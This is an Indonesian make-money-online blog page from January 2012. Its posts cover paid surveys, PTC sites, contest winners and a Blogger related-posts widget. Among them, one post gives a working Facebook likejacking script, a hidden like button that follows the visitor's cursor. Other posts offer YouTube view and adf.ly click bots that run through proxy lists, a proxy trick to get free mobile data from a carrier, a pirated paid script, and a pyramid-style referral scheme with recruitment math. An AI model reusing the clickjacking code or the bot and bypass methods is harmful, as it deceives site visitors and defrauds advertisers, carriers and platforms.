Cara Mudah Mendapat Dollar dengan Android
Dollar dengan android   Potensi penghasilan $30/hari:
Caranya:
1. Download aplikasi ini --> Klik Disini
2. Daftar dengan akun facebook sobat
3. Masukkan kode undangan AE91549 untuk mendapat $0,3 pertama sobat
4. Buka aplikasi setiap hari, maka dollar akan semakin menumpuk...
     
pulsagram, pembayaran mudah dan cepat, transaksi online, pembayaran tagihan dan tiket, transfer dana online

Sabtu, 28 Januari 2012

Cara Menambah View Youtube Video

Cara Menambah View Youtube Video - Apa kabar sobat? gerah sekali hari ini sob. Mungkin karena efek badai matahari kali ya. Ada gak ya rekaman badai matahari yang diunggah di internet? di Youtube gitu, buat nambah wawasan bagaimana ledakan-ledakan yang terjadi di matahari yang katanya setara dengan 60x ledakan bom atom yang dijatuhkan di Hiroshima dulu.
Ngomong-ngomong soal video nih sob, pastinya sobat tahu dong dengan Youtube. Nah posting kali ini ane tujukan bagi sobat yang memiliki posting video di Youtube namun masih memiliki view yang sedikit. Dengan bantuan tool ini, semoga view Youtube sobat menjadi makin bertambah. Tool yang dimaksud dapat sobat download di link berikut:

Youtube Booster Download

Langkah yang harus dilakukan:
1. Setelah download, extract ke folder yang dikehendaki
2. Catat/copy alamat URL video yang dikehendaki (yang akan ditambah viewnya)
2. Buka View Bot Bypass.exe
3. Paste pada text area View Bot Bypass.exe seperti dibawah

Cara Menambah View Youtube Video

4. Buka Auto Youtube viewer.exe seperti dibawah

Cara Menambah View Youtube Video

5. Klik tombol Load Proxy List, lalu tuju pada file "proxy.txt" di folder hasil extract tadi (Untuk mencari proxy dapat menggunakan tool pencari proxy, baca disini)
6. Paste URL Youtube pada menu URL Here (untuk delay dan views dapat sobat sesuaikan sendiri)
7. Tekan tombol Start untuk mulai menambah view youtube video sobat
8. Selamat mencoba

More...

Cara Mencari Proxy dengan Proxy Grabber

Cara Mencari Proxy dengan Proxy Grabber - Berikut ane berikan sebuah tool untuk mencari proxy yang masih "hidup". Dengan tool ini sobat bisa dengan mudah menyimpan alamat proxy untuk digunakan dalam berbagai tool yang dapat aktif dengan menggunakan proxy (biasanya tool berupa bot yang sering menggunakan proxy), Silahkan sobat download melalui link berikut:

Proxy Grabber Download

Nah setelah sobat download, ini dia SSnya
Cara Mencari Proxy dengan Proxy Grabber

Nah sobat bisa Export Proxies yang telah didapat untuk kemudian digunakan seperlunya.

More...

Jumat, 27 Januari 2012

Internet Gratis Three Terbaru via UCWEB Handler Januari 2012

Internet Gratis Three Terbaru via UCWEB Handler Januari 2012 - Tips ini ane dapet dari blogger sebelah di sini yang berbagi tips Internet Gratis Three Terbaru via UCWEB Handler Januari 2012, langsung saja ya..
Setting UCweb Handler

Front Query : 0.facebook.com.www.w-eb.com/cgi-bin/nph-proxy.cgi/111110A/http/
Back Query : ?wap.three.co.id
Proxy Type : Host
Proxy Server : wap.three.co.id

Ini Buktinya







Download UCweb Handler

UCweb700ENhandlerui.jar

More...

Pengumuman Pemenang Kontes SEO Century 21 Broker Properti Jual Beli Sewa Rumah Indonesia Periode 2011

Pengumuman Pemenang Kontes SEO Century 21 Broker Properti Jual Beli Sewa Rumah Indonesia Periode 2011
Pengumuman Pemenang Kontes SEO Century 21 Broker Properti Jual Beli Sewa Rumah Indonesia Periode 2011

Selamat pada pemenang Kontes SEO periode 2011
  1. Nama: Lerry apriantoni
    Winning URL: http://www.ovcio.com/century-21-broker-properti-jual-beli-sewa-rumah-indonesia.html

  2. Nama: Syahrullah
    Winning URL: http://lingkarmerah.blogspot.com/2011/11/century-21-broker-properti-jual-beli.html

  3. Nama: Dede Yahya
    Winning URL: http://www.dedeyahya.com/2011/11/century-21-broker-properti-jual-beli.html

  4. Nama: Ahmad Subhan
    Winning URL: http://seoblogger4.blogspot.com/2011/11/century-21-broker-properti-rumah.html

  5. Nama: Aris Nurbawani
    Winning URL: http://arisnb.nulis.web.id/century-21-broker-properti-jual-beli-sewa-rumah-indonesia.html

  6. Nama: Ulun Nuha Hafidhi
    Winning URL: http://www.holic.web.id/century-21-broker-properti-jual-beli-sewa-rumah-indonesia.html

  7. Nama: Yoga Ailala
    Winning URL: http://www.yoga.web.id/2011/11/century-21-broker-properti-jual-beli.html

  8. Nama: Khoirudin
    Winning URL: http://pendhowo.com/century-21-broker-properti-jual-beli-sewa-rumah-indonesia

  9. Nama: Wahyu Winoto
    Winning URL: http://www.wahyu-winoto.com/2011/11/century-21-broker-properti-jual-beli.html

  10. Nama: Sugianto
    Winning URL: http://sugicloud.com/century-21-broker-properti-jual-beli-sewa-rumah-indonesia.htm

Selamat pada pemenang Kontes BLOG periode 2011
  1. Nama: Agustina Shita Hapsari
    Winning URL: http://hapsarishita.wordpress.com/2012/01/08/berburu-rumah-impian/

  2. Nama: Widi Krisna Permadi
    Winning URL: http://widikrisna.wordpress.com/2011/12/31/broker-properti-paling-terpercaya-ya-century-21/

  3. Nama: Dani Setiyawan
    Winning URL: http://danisetiyawan.com/tips-memilih-broker-properti-jual-beli-sewa-rumah/

  4. Nama: Atep Saepulloh
    Winning URL: http://www.atepsaepulloh.com/2011/11/bagaimana-menjadi-kaya-dengan-properti

  5. Nama: Agus Siswoyo
    Winning URL: http://agussiswoyo.com/2011/11/10/century-21-broker-properti-jual-beli-sewa-rumah-indonesia/

  6. Nama: Azis
    Winning URL: http://updaterumah.blogspot.com/

  7. Nama: Amin Trirahayu
    Winning URL: http://www.ujungaspal.com/?p=1278

  8. Nama: Josia Rachmadi
    Winning URL: http://ipul.blog.com/2012/01/01/century-21-broker-properti-jual-beli-sewa-rumah-indonesia/

  9. Nama: Mukhammad Al Rasyid
    Winning URL: http://sahabatmenujusukses.blogspot.com/

  10. Nama: Astri Yuliama
    Winning URL: http://astriyuliana89.blogspot.com/2012/01/rumahsatu-kata-namun-berbobot-makna.html

More...

Rabu, 25 Januari 2012

Bukti Pembayaran Digieclub.com (Pembayaran Keempat)

Bukti Pembayaran Digieclub.com (Pembayaran Keempat) - Selamat pagi sobat raseco, moga hari ini menyenangkan ya sob. Tepat di hari ulang tahun ane neh sob [24 Januari 2012], ane dapat pembayaran dari digieclub yang keempat. Berikut SS dari internet banking Danamon

Bukti Pembayaran Digieclub.com (Pembayaran Keempat)

Lumayan sob, Rp. 58.270 buat beli permen :D
sobat mau? silahkan join disini sob http://www.digie.co.id/raseco


More...

Minggu, 22 Januari 2012

Sewa Ruang Kantor Jakarta Murah

Sewa Ruang Kantor Jakarta Murah - Ada kontes SEO baru lagi nih sob, Sewa Ruang Kantor Jakarta Murah judul keywordnya. Para master sudah menduduki peringkat atas...serem mau ikutan sudah pasti nangkring di juru kunci. Melalui postingan ini, raseco menyemangati para pejuang SEO yang ikut kontes SEO Sewa Ruang Kantor Jakarta Murah. Semoga berhasil..

Sewa Ruang Kantor Jakarta Murah

More...

Sabtu, 21 Januari 2012

Cara Membuat Related Post di Blogger

Cara Membuat Related Post di BloggerCara Membuat Related Post di Blogger - Selamat malam sobat raseco. Ingin membuat related post di blogger sobat? nah jika jawabannya adalah "Ya", maka sudah tepat sobat membaca posting berikut. Apa sih related post? related post adalah posting yang berkaitan dengan posting sobat yang telah ditampilkan. Mungkin kalau panjang lebar agak susah nangkapnya ya sob? begini aja deh, sobat lihat aja di bagian blog ane ini di bawah kotak admin ada tulisan related to **** nah itu dia yang dimaksudkan dengan related post. Mau tahu bagaimana cara membuat related post di blogger? begini caranya:

1. Login ke akun blogger sobat
2. Masuk ke menu Design-->Edit HTML, jangan lupa centrang Expand Widget Templates
3. Cari kode <p><data:post.body/></p> (tekan Control+F untuk mencari)
4. Copy-paste kode berikut tepat di bawah kode
<p><data:post.body/></p>


<div style='-moz-border-radius: 5px 5px 5px 5px;border: 1px solid rgb(238, 238, 238);padding: 3px; overflow: auto; width: 470px; height: 300px;background-color: #F5F5F5'>

<h2 class='related-to'>Related to <data:post.title/> : </h2><br/>
<div class='similiar'>
<div class='widget-content'>
<div id='data2007'/>

<script type='text/javascript'> var homeUrl3 = &quot;<data:blog.homepageUrl/>&quot;; var maxNumberOfPostsPerLabel = 4; var maxNumberOfLabels = 10; maxNumberOfPostsPerLabel = 10; maxNumberOfLabels = 3; function listEntries10(json) { var ul = document.createElement(&#39;ul&#39;); var maxPosts = (json.feed.entry.length &lt;= maxNumberOfPostsPerLabel) ? json.feed.entry.length : maxNumberOfPostsPerLabel; for (var i = 0; i &lt; maxPosts; i++) { var entry = json.feed.entry[i]; var alturl; for (var k = 0; k &lt; entry.link.length; k++) { if (entry.link[k].rel == &#39;alternate&#39;) { alturl = entry.link[k].href; break; } } var li = document.createElement(&#39;li&#39;); var a = document.createElement(&#39;a&#39;); a.href = alturl; if(a.href!=location.href) { var txt = document.createTextNode(entry.title.$t); a.appendChild(txt); li.appendChild(a); ul.appendChild(li); } } for (var l = 0; l &lt; json.feed.link.length; l++) { if (json.feed.link[l].rel == &#39;alternate&#39;) { var raw = json.feed.link[l].href; var label = raw.substr(homeUrl3.length+13); var k; for (k=0; k&lt;20; k++) label = label.replace(&quot;%20&quot;, &quot; &quot;); var txt = document.createTextNode(label); var h = document.createElement(&#39;b&#39;); h.appendChild(txt); var div1 = document.createElement(&#39;div&#39;); div1.appendChild(h); div1.appendChild(ul); document.getElementById(&#39;data2007&#39;).appendChild(div1); } } } function search10(query, label) { var script = document.createElement(&#39;script&#39;); script.setAttribute(&#39;src&#39;, query + &#39;feeds/posts/default/-/&#39; + label + &#39;?alt=json-in-script&amp;callback=listEntries10&#39;); script.setAttribute(&#39;type&#39;, &#39;text/javascript&#39;); document.documentElement.firstChild.appendChild(script); } var labelArray = new Array(); var numLabel = 0; <b:loop values='data:posts' var='post'> <b:loop values='data:post.labels' var='label'> textLabel = &quot;<data:label.name/>&quot;; var test = 0; for (var i = 0; i &lt; labelArray.length; i++) if (labelArray[i] == textLabel) test = 1; if (test == 0) { labelArray.push(textLabel); var maxLabels = (labelArray.length &lt;= maxNumberOfLabels) ? labelArray.length : maxNumberOfLabels; if (numLabel &lt; maxLabels) { search10(homeUrl3, textLabel); numLabel++; } } </b:loop> </b:loop> </script> </div> </div> </div>
5. Simpan template sobat untuk melihat hasilnya


More...

Jumat, 20 Januari 2012

Tolak RUU SOPA dan PIPA

Tolak RUU SOPA dan PIPATolak RUU SOPA dan PIPA - Sebagai warga negara internet, raseco.web.id secara tegas menentang dilegalisasikannya UU SOPA dan PIPA. Sebagai blogger sangat mendukung situs raksasa seperti Google, Facebook, Twitter, Zynga, eBay, Mozilla, Yahoo, AOL, dan LinkedIn yang telah menulis surat terbuka kepada anggota Senat dan Dewan AS untuk menentang SOPA.

Mengapa? tentu saja setelah diberlakukannya SOPA dan PIPA kebebasan dalam berkreasi, berekspresi, bereksperimen sudah dihentikan sampai disini. Memang sebenarnya berlakunya UU SOPA dan PIPA ini untuk mencegah terjadinya pembajakan seperti konten video, MP3, material yang berpaten, bahkan konten blog/website yang terindikasi copy paste juga dipastikan akan diblokir.

Sekarang mau ngapain lagi sob kalau buka internet? situs apa yang mau dilihat? facebook tutup, google mati, 4shared redup, megaupload closed...coba deh bayangin!

Sebagai blogger, raseco dengan tegas menolak diberlakukannya RUU SOPA dan PIPA..hidup atau mati!

Bantu menolak disini http://americancensorship.org/


More...

Kamis, 19 Januari 2012

Bukti Pembayaran Ipanelonline.com (Pembayaran Ke-9)

Join Ipanelonline.com

Bukti Pembayaran Ipanelonline.com (Pembayaran Ke-9) - Selamat berjumpa lagi di raseco.web.id, postingan kali ini adalah Bukti Pembayaran Ipanelonline.com (Pembayaran Ke-9).
Masih tetap senang kan sob membaca postingan di web ane?

Makanan apa ipanelonline itu mas?
Memang selama Lebaran banyak makanan ya sob, hehehe tapi jangan salah, ipanelonline bukan makanan sob...Ipanelonline itu sebuah website yang menawarkan survey online dan membayar setiap peserta surveynya dengan dollar. Kalau masih belum pernah dengar, silahkan sobat baca postingan ane tentang Dapat Duit dengan isi Survey di ipanelonline.com dan beberapa tips dan triknya Tips dan Trik Mendapat Tambahan Uang Saku dengan Survey di ipanelonline

Dollar? Mau donk!!
Bagi sobat yang tertarik dan ingin mendapatkan dollar setiap harinya silahkan klik banner di bawah ini:

Join Ipanelonline.com

Beneran dibayar kagak neh? awas kalo gak!!
wess..tenang sob, sabarrr...orang sabar disayang pacar lho..Ipanelonline benar-benar website legit dan terbukti membayar dan ane telah 9 kali menerima pembayarannya. Pembayaran yang ke 3 bisa dicek disini sob, Pembayaran yang ke-4 silahkan cek disini, untuk pembayaran yang ke-5 silahkan cek disini, Pembayaran sebelumnya (ke-8) cek disini sementara untuk Bukti Pembayaran Ipanelonline.com (Pembayaran Ke-9) berikut screenshotnya:





Walau kecil bisa untuk beli es krim sob hehehe..
Ikutan gabung disini rasakan dan buktikan sendiri:
Join Ipanelonline.com



More...

Selasa, 17 Januari 2012

Pemenang Blog Kontes Resolusi Juara 2012 dari Telkom Speedy

Pemenang Blog Kontes Resolusi Juara 2012 dari Telkom Speedy

Pemenang Blog Kontes Resolusi Juara 2012 dari Telkom Speedy

Selamat kepada,

Pemenang 1, judul blogpost: Bisnisku, Resolusiku

URL: http://diarykhansa.blogspot.com/2011/12/bisnisku-resolusiku.html

Oleh Alfiani Maimana.

Mendapatkan 1 unit Samsung Galaxy Tab 7.0 Plus Black.

 

Pemenang 2, judul blogpost: resolusiku di 2-0-1-2 dengan speedy !

URL: http://bambangworld.blogspot.com/2012/01/resolusiku-di-2-0-1-2-dengan-speedy.html

Oleh Moch. Bambang Sulistio.

Mendapatkan 1 unit Blackberry Onyx 2 9780, 512 MB.

 

Pemenang 3, judul blogpost: Resolusi Juara 2012

URL: http://narzis.net/2011/12/resolusi-juara-2012.html

Oleh Hantoro Sapto Utomo.

Mendapatkan 1 unit LCD TV Sony 32 inch.

 

Serta, selamat kepada 20 peserta yang memenangkan hadiah hiburan berupa merchandise dari Telkom Speedy! Pemenang hadiah hiburan diurut berdasar alfabet.

1. Adi Nur Achmad, http://addynoer.blogspot.com/2012/01/resolusi-juara-di-2012-new-year-new.html

2. Aji Prakoso, http://jiprak.com/2011/12/resolusi-tahun-baru-2012.html

3. Angling Surya Perdana, http://ikemasenojousama.blogspot.com/2012/01/special-new-year-post-flashback-and.html

4. Anisah Nurul Hidayati, http://speedy-competition.blogspot.com/2011/12/realize-power-of-dreams.html

5. Atdayyan, http://atdyn.blogspot.com/2012/01/resolusi-juara-2012-ala-pelajar-sma.html

6. Bayu Setiawan, http://penulisdunia.wordpress.com/2011/12/17/resolusiku-di-tahun-2012/

7. Berry Hardisakha, http://berryhs.com/2011/12/resolusi-juara-2012.html

8. Cecep Adi Kustaman, http://potrett-desaku.blogspot.com/2011/12/resolusi-juara-2012-menuju.html

9. Erlin Fitriyanti, http://penamerangkai.wordpress.com/2012/01/04/resolusiku/

10. Firmansyah Shidiq Wardhana, http://firmansyahshidiqwardhana.wordpress.com/2012/01/07/resolusi-juara-2012/

11. Jefriadi, http://bujangdumai.blogspot.com/2012/01/go-green-dengan-adanya-internet.html

12. M Ardian Nugraha, http://ardiannugraha.com/2011/12/resolusi-juara-2012-jurnalis-muda.html

13. Mansyur Rahim, http://lelakibugis.net/2011/12/20/merekam-makassar-dari-diari-hingga-blog/

14. Paris Mubaqi, http://njowotenan.blogspot.com/2011/12/resolusi-juara-2012.html

15. Pratama Budiman, http://gogopratamax.blogspot.com/2011/12/2012-lewati-penulisan-ilmiah.html

16. Ratri Asmara Sari, http://keluarga-fauzi.blogspot.com/2012/01/berkat-speedy.html

17. Rusydi Hikmawan, http://timurlombok.blogspot.com/2011/12/mengangkut-asa-ke-desa.html

18. Vinny Muthia Sari, http://wierennen.blogspot.com/2012/01/welcome-2012.html

19. Yayan Cahyana, http://cahyamediaku.blogspot.com/2011/12/pengabdian-sosial-untuk-pendidikan-anak.html

20. Yudha Surya Pradipta, http://programatujuh.wordpress.com/2012/01/06/resolusi-juara-2012-berkah-dari-kegagalan/

 

Semua pemenang akan dihubungi oleh panitia dalam waktu 2 minggu ke depan.Hadiah utama akan dikirim dan diserahkan melalui kantor Telkom setempat. Hadiah hiburan berupa merchandise  Telkom akan langsung dikirim ke alamat pemenang.  Hati-hati terhadap penipuan yang mengatasnamakan program Telkom. Semua pemenang tidak akan dikenakan biaya apapun. Selamat kepada para pemenang! Ayo mulai jalankan resolusi kamu dan jadilah Sang Juara di tahun ini!



More...

Script Facebook Likejacking, Cara Curang Like Facebook

Script Facebook Likejacking, Cara Curang Like Facebook - Lagi-lagi facebook ya sob hehe..memang tidak ada habisnya kalau ngomongin jejaring sosial yang satu ini. Dunia serasa tidak terbatas dan sangat kecil ya sob, mau ketemu orang luar negeri aja gak perlu kesana, sudah bisa dengan fasilitas facebook. Nah posting kali ini ditujukan untuk mencurangi facebook, ya mencurangi facebook...kok main curang sih? lha ane kan tahu kesenangan sobat, suka yang instan-instan dan curang-curang hehe..
Nah posting ini berjudul Script Facebook Likejacking, Cara Curang Like Facebook, ketahuan kan tujuannya? ya tujuannya adalah membuat pengunjung blog akan selalu mengklik tombol like pada halaman/page sobat sekalian. Keren kan? mau tahu Script Facebook Likejacking, Cara Curang Like Facebook? silahkan copy-paste script dibawah ini di blog sobat (gunakan widget HTML/Javascript)

<script src="http://code.jquery.com/jquery-1.5.js"></script> <style>
html, body { margin: 0; padding: 0; width: 100%; height: 100%; overflow: hidden; }
div.wrapper { width: 100%; height: 100%; overflow: auto; }
img.bg { min-height: 100%; min-width: 1024px; width: 100%; height: 100%; position: fixed; top: 0; left: 0;z-index: 0; }
@media screen and (max-width: 1024px) { img.bg { left: 50%; margin-left: -512px; } }
#content { text-align: center; position: absolute; width: 100%; height: 100%; top: 0; left: 0; color: #fff;font-family: 'palatino linotype', palatino; font-weight: normal; text-align: left; text-shadow: 0 1px 0 #000; z-index: 10; }
#content .description { position: relative; width: 580px; left: 50%; margin-left: -290px; }
#content .description h1 { font-size: 32px; }
#content .description .warning { color: #f00; }
#content .description .link, #content .description a { font-size: 22px; color: #fff; text-decoration:underline; }
#content .description .footer, #content .description .footer a { font-size: 10px; }
</style>


<span id="link" class="link">
<div id="content">




</div>
<div id="wrapper" style="position: absolute; opacity: 1; filter: alpha(opacity = 0); margin-left: -50px; z-index:100;">


<iframe src="//www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FRasecowebid%2F186314464729833&amp;layout=button_count&amp;show_faces=false&amp;width=50&amp;action=like&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:50px; height:21px;" allowtransparency="true"></iframe>


<script>
FB.Event.subscribe('edge.create',function(response) {window.top.location.href = "http://apps.facebook.com/gandjarexe/";});
</script>
</div>
<script type="text/javascript">
jQuery( document ).ready( function() {
$( "#link" ).mousemove( function( e ) {
$( '#wrapper' ).css( {
top: e.pageY - 10,
left: e.pageX + 20
} );
} );
} )
</script>


</span>

Nah silahkan sobat ganti script teks yang berwarna merah dengan script likebox/like dari pages sobat.
Nah untuk melihat previewnya silahkan kunjungi http://gudangrpp.blogspot.com/
Gimana? mantap bukan?...
More...

Automatic Website Builder, Cara Membuat Website Otomatis

Automatic Website Builder, Cara Membuat Website Otomatis - Sebagai pemula dalam membuat sebuah website seperti ane, tentu tidak mau susah-susah belajar bahasa yang aneh-aneh, PHP atau apalah itu namanya. Kenapa? ya karena sudah tua sudah semakin banyak lupa dan kalaupun belajar sudah susah sekali "nyanthol". Kata pepatah kalau bisa mudah kenapa dipersulit? nah belajar dari pepatah tersebut kini telah hadir sebuah sistem yang membantu para nubie (seperti ane) untuk membangun sebuah website professional hanya dengan sekali klik (atau berkali-kali ya :D)

Bagi sobat yang bergelut dalam dunia perwebsitean, nah tool ini (script) sangat cocok untuk sobat gunakan sebagai senjata ampuh untuk membangun sebuah website, nama tool ini adalah Website Maker / Builder Script for Php dengan alamat supportnya di http://www.websitemakerscript.com/

Nah tool ini dibanderol dengan harga yang sangat murah, hanya $99 USD dan sobat bisa membayarnya dengan menggunakan paypal sobat. Sebuah harga yang pantas tentunya untuk sebuah sistem yang canggih.
Untuk melihat demonya sobat bisa mampir ke alamat: http://www.websitemakerscript.com/demo/


Sobat dapat membuat website dengan cepat dan melakukan kustomisasi sesuai keinginan sobat. Nah mudah bukan? silahkan sobat kunjungi http://www.websitemakerscript.com/ untuk membeli tool ini :D, oya jangan lupa siapin $99USD dulu sob..

Hmm kadang manusia tidak lepas dari kebokekan alias ODD (Ora Duwe Duit) atau KanKer (Kantong Kering). Nah khusus sobat yang mengalami gejala seperti ini, berhubung kita adalah sahabat alias "bolo" ya ane kasih deh, gratisss tanpa pake $99USD. Mau? silahkan download scriptnya disini:

Download Disini

Nah setelah berhasil sobat download, segera upload ke hosting sobat dan segera berbisnis dengan menjual jasa membuat website. Semoga sukses sob! Oya kalo sudah sukses jangan lupa dengan ane ya..
More...

Download Shopping Cart VIP Version 4.0

Download Shopping Cart VIP Version 4.0  - Sobat punya usaha? mungkin jual beli atau usaha jasa? saat ini butuh pemasaran yang mendunia? nah jika jawabannya adalah YA, maka sistem ini sangat cocok untuk sobat. Sistem ini adalah Shopping Cart VIP Version 4.0, sebuah sistem untuk e-commerce alias jual beli online. Seperti halnya di amazon, atau bhinneka.com.

Download Shopping Cart VIP Version 4.0 disini
Download Shopping Cart VIP Version 4.0


Situs produsen: http://www.vipprofitzone.com/Shopping_Cart/Software.html

Demo site: http://vipprofitzone.com/demo/vipcart/

Admin control panel: http://vipprofitzone.com/demo/vipcart/newadmin
username: demo
password: demo123

Setelah sobat berhasil download, upload seluruh file di hosting server sobat. Selamat berbisnis :D
More...

Senin, 16 Januari 2012

Adf.ly Bot, Cara Menambah Klik pada Adf.ly

Adf.ly Bot, Cara Menambah Klik pada Adf.ly - Sobat pernah denger tentang situs adf.ly bukan? ya, sebuah situs redirect (juga shrink URL) sebelum masuk ke link yang sesungguhnya. Nah adf.ly ini akan membayar publishernya saat pengunjung melihat halaman adf.ly/xxxxx dan klik pada Skip Ad di bagian kanan atas, setiap 1000 pengunjung mendapat 4 atau 5$USD (sepertinya tergantung dari asal pengunjungnya). Memang cukup lama untuk memperoleh 1000 pengunjung, betul bukan? dari promosi, aksi tipu-tipu, pasang jebakan betmen dsb. Nah sekarang nggak usah susah-susah dengan metode konvensional tersebut, Raseco malam ini share sebuah Bot untuk adf.ly. Dengan tool ini, klik adf.ly sobat akan semakin bertambah tanpa harus mengunjungi alamat adf.ly sobat. Mudah-mudahan Adf.ly Bot, Cara Menambah Klik pada Adf.ly ini bermanfaat bagi sobat yang sedang mencari receh di internet.

Screenshot Adf.ly Bot:

Menu utama:
Adf.ly Bot, Cara Menambah Klik pada Adf.ly

Setting proxy:
Proxy Adf.ly Bot, Cara Menambah Klik pada Adf.ly

Untuk memperoleh fresh proxy, silahkan sobat gunakan proxy di http://www.xroxy.com/proxylist.php?port=&type=&ssl=&country=&latency=1000&reliability=9000#table atau http://www.hidemyass.com/proxy-list

Silahkan download file di sini: Adfly_v152_raseco.web.id.exe - 504 KB
Bagi yang belum bergabung di adf.ly silahkan klik disini untuk bergabung

More...

Jumat, 13 Januari 2012

Bukti Pembayaran Ipanelonline.com (Pembayaran Ke-8)

Join Ipanelonline.com

Bukti Pembayaran Ipanelonline.com (Pembayaran Ke-8) - Selamat berjumpa lagi di raseco.web.id, postingan kali ini adalah Bukti Pembayaran Ipanelonline.com (Pembayaran Ke-8).
Masih tetap senang kan sob membaca postingan di web ane?

Makanan apa ipanelonline itu mas?
Memang selama Lebaran banyak makanan ya sob, hehehe tapi jangan salah, ipanelonline bukan makanan sob...Ipanelonline itu sebuah website yang menawarkan survey online dan membayar setiap peserta surveynya dengan dollar. Kalau masih belum pernah dengar, silahkan sobat baca postingan ane tentang Dapat Duit dengan isi Survey di ipanelonline.com dan beberapa tips dan triknya Tips dan Trik Mendapat Tambahan Uang Saku dengan Survey di ipanelonline

Dollar? Mau donk!!
Bagi sobat yang tertarik dan ingin mendapatkan dollar setiap harinya silahkan klik banner di bawah ini:

Join Ipanelonline.com

Beneran dibayar kagak neh? awas kalo gak!!
wess..tenang sob, sabarrr...orang sabar disayang pacar lho..Ipanelonline benar-benar website legit dan terbukti membayar dan ane telah 4 kali menerima pembayarannya. Pembayaran yang ke 3 bisa dicek disini sob, Pembayaran yang ke-4 silahkan cek disini, untuk pembayaran yang ke-5 silahkan cek disini, sementara untuk Bukti Pembayaran Ipanelonline.com (Pembayaran Ke-8) berikut screenshotnya:

 Bukti Pembayaran Ipanelonline.com (Pembayaran Ke-8)

Berbeda dengan pembayaran yang ane terima sebelumnya, disini ane kena potong sekitar $0,4 USD, sehingga bersihnya hanya dapat $1,8USD saja. Namun lumayan juga sob buat beli pulsa hehe...mau??

Ikutan gabung disini rasakan dan buktikan sendiri:
Join Ipanelonline.com



More...

Benarkah Wazzub Membayar?

Benarkah Wazzub Membayar?

Selamat malam sobat raseco semua..di malam yang dingin ini ku sendiri tiada yang menemani (kayak lagu aja ya sob) hanya sebuah laptop dengan diiringi musik dari radio Geronimo FM Jogjakarta via Jogjastreamers ingin berbagi dengan sobat akan sebuah bisnis online terbaru yang sedang ramai dibicarakan di jagad persilatan bisnis online. Namanya adalah Wazzub!...
Silahkan kunjungi websitenya disini www.wazzub.info

Apa itu Wazzub?
Wazzub dengan slogannya "The Power of We" merupakan sebuah "profit sharing phenomenom" alias fenomena sharing keuntungan, dan katanya program ini benar benar gratis dan membayar membernya hanya dengan join di Wazzub..sungguh luar biasa. Ane sendiri gak tahu kok bisa-bisanya mereka membayar kita secara cuma-cuma. Namun tidak ada salahnya mencoba sob. Ya kan?

Bagaimana Wazzub membayar kita?
Saat ini Wazzub belum launching website utamanya, dimana pada 9 April 2012 nanti mereka akan launching website yang menampilan iklan dan layanan khusus mereka, dimana mereka mengatakan akan sama layanannya dengan facebook, google, AOL dan Yahoo. Nah perbedaannya kalau situs seperti facebook, keuntungannya hanya untuk mereka sendiri (pihak perusahaan) sementara Wazzub akan membagikan keuntungannya dengan para membernya

Kapan Wazzub membayar?
Wazzub akan membayar membernya tiap bulan. Pembayaran yang pertama akan dilakukan pada tanggal 15 Mei 2012 untuk pembayaran bulan April. Pembayaran akan dilakukan dengan metode online (Paypal/LR/dll) dan metode cek

Benarkah Wazzub membayar 1$ per member?
Dikatakan di website Wazzub, setiap member akan memperoleh 1$ dari setiap member yang mendaftar di bawahnya dan nilai ini dinamakan $FACTOR. Jadi semakin banyak member bergabung dengan sobat maka semakin tinggi $FACTOR sobat untuk kemudian dikalkulasi menjadi $

Kerja sobat cm daftar and sebarin ke orang2 tentang Wazzub...
Sobat mendapatkan $1.00 per member tak terbatas sampai kedalaman 5 level generasi didalam keluarga WAZZUB
Kalo sobat hanya mengajak 5 teman untuk join secara GRATIS dan mereka melakukan 5 generasi yang sama

1st. Generation 5 x $1.00 = $5.00
2nd. Generation 25 x $1.00 = $25.00
3rd. Generation 125 x $1.00 = $125.00
4th. Generation 625 x $1.00 = $625.00
5th. Generation 3125 x $1.00 = $3,125.00
__________________________________
pasivve income yang sobat dapatkan:$ 3,905.00 setiap bulan untuk melakukan yang berbeda dari yang biasa anda lakukan...

Berita tentang Wazzub:
disini ( BACA SOB)
disini
disini

Perlu Diingat!
1) 1 Januari 2012 Pre Launch - Mulai Membangun Kekaisaran sobat Sekarang, sampai 31 Maret 2012. Jangan Ketinggalan!!
2) 31 Maret 2012 - Jika sobat belum bergabung, maka sobat mungkin akan menyesali ini untuk sisa hidup sobat
3) 1 April 2012 Beta - Peluncuran
4) 1 Juli 2012 Lengkap - Peluncuran
5) Pembayaran Pertama 15 Mei 2012 untuk bulan April!

Saya tidak yakin Wazzub membayar, paling juga Wazzub SCAM
Ya, pertanyaan yang sama juga ane lontarkan seperti itu. Takutnya Wazzub SCAM! namun karena ane lihat di dunia maya sedang membicarakan website ini, akhirnya ane tepis pemikiran itu dengan alasan tidak ada salahnya mencoba, toh gratis ini dan tidak ada yang dirugikan. Betul kan sob?
Nah jika ingin mencoba peruntungan bersama Wazzub ini, silahkan sobat bergabung dengan klik banner dibawah ini:

Ingat, 1 member sobat akan mendapat 1$..jadi banyak member banyak $$ yang bisa didapat

Bagi sobat yang bergabung dengan referal ane disini, buat semangat sobat ane kasih bonus $0,1 via paypal untuk 20 pendaftar pertama dan silahkan komen di postingan ini dengan alamat email paypal yang valid. Akan ane cek tiap harinya..

NB: mumpung masih belum banyak yang tahu, silahkan sobat rekrut member sebanyak-banyaknya..karena di websitenya dikatakan 99,99% penduduk dunia belum mengetahui info ini!

More...

Selasa, 10 Januari 2012

Ramabux, PTC Terbaik Indonesia

Ramabux, PTC Terbaik Indonesia - Selamat siang sobat raseco semuanya..apa kabar hari ini? semoga hari ini menyenangkan ya sob. Kali ini ane mau posting mengenai sebuah PTC (Paid To Click) lokal asli Indonesia yaitu Ramabux. Beberapa kelebihan Ramabux sebagai berikut:


1. Sobat dibayar dengan melakukan klik iklan
Pada bagian ini, sobat harus mengklik untuk mendapatkan bayaran. Penghasilan perklik tergantung lamanya sobat mengunjungi website. Lamanya kunjungan setiap website sudah diatur oleh Advertiser. Perhitungan penghasilan sobat:
- 3 Detik = Rp. 5
- 20 Detik = Rp. 50
- 30 Detik = Rp. 75
- 40 Detik = Rp. 100

Setiap hari, akan muncul iklan-iklan yang siap untuk diklik. Jumlah iklan tergantung dari Advertiser yang memasangkan iklannya.

2. Sobat dibayar hanya dengan membaca iklan
Baca iklan merupakan salah satu sumber penghasilan yang mungkin tidak ada di website lokal. Disini, sobat dibayar setiap baca iklan. Baca iklan hampir sama dengan Klik Iklan atau PTC. Penghasilan dihitung berdasarkan waktu mengunjungi website. Waktu setiap iklan di set oleh Advertiser. Daftar penghasilan sobat:
- 3 Detik = Rp. 6
- 20 Detik = Rp. 60
